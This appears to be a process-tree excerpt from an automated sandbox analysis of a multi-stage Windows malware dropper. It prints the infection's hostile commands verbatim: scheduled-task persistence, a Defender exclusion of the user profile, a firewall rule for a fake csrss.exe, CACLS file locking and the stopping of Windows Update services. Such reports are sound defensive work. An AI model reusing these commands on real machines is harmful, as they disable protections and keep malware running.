PID 3408 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 3408 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 3408 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 3408 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 3408 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2744 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2744 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2744 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2196 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2196 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2196 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 3208 wrote to memory of 1916 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe
PID 3208 wrote to memory of 1916 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe
PID 3208 wrote to memory of 1916 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe
PID 1916 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe
PID 1916 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe
PID 1916 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe
PID 3208 wrote to memory of 1664 N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe
PID 3208 wrote to memory of 1664 N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe
PID 3208 wrote to memory of 1664 N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe
PID 3208 wrote to memory of 1088 N/A N/A C:\Windows\system32\cmd.exe
PID 3208 wrote to memory of 1088 N/A N/A C:\Windows\system32\cmd.exe
PID 4124 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe
PID 4124 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe
PID 4124 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe
PID 3904 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe
PID 3904 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe
PID 3904 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe
PID 3208 wrote to memory of 3696 N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe
PID 3208 wrote to memory of 3696 N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe
PID 3208 wrote to memory of 3696 N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe
PID 3208 wrote to memory of 4972 N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe
PID 3208 wrote to memory of 4972 N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe
PID 3208 wrote to memory of 4972 N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe
PID 632 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe
PID 632 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe
PID 632 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe
PID 4800 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe
PID 4800 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe
PID 4800 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe
PID 3208 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe
PID 3208 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe
PID 3208 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe
PID 1088 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1088 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3208 wrote to memory of 2148 N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe
PID 3208 wrote to memory of 2148 N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe
PID 3208 wrote to memory of 2148 N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe
PID 4800 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe
PID 4800 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe
PID 4800 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\9F58.exe

C:\Users\Admin\AppData\Local\Temp\9F58.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\A0FF.exe

C:\Users\Admin\AppData\Local\Temp\A0FF.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A238.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\A46C.exe

C:\Users\Admin\AppData\Local\Temp\A46C.exe

C:\Users\Admin\AppData\Local\Temp\A5C5.exe

C:\Users\Admin\AppData\Local\Temp\A5C5.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\A6FE.exe

C:\Users\Admin\AppData\Local\Temp\A6FE.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\A98F.exe

C:\Users\Admin\AppData\Local\Temp\A98F.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\AAB9.exe

C:\Users\Admin\AppData\Local\Temp\AAB9.exe

C:\Users\Admin\AppData\Local\Temp\AEB2.exe

C:\Users\Admin\AppData\Local\Temp\AEB2.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Users\Admin\AppData\Local\Temp\B952.exe

C:\Users\Admin\AppData\Local\Temp\B952.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,8078885434444204845,17138545947143437028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,8078885434444204845,17138545947143437028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=A98F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9D.exe

C:\Users\Admin\AppData\Local\Temp\9D.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\4F3.exe

C:\Users\Admin\AppData\Local\Temp\4F3.exe

C:\Users\Admin\AppData\Local\Temp\5DE.exe

C:\Users\Admin\AppData\Local\Temp\5DE.exe

C:\Users\Admin\AppData\Local\Temp\B1F.exe

C:\Users\Admin\AppData\Local\Temp\B1F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=A98F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

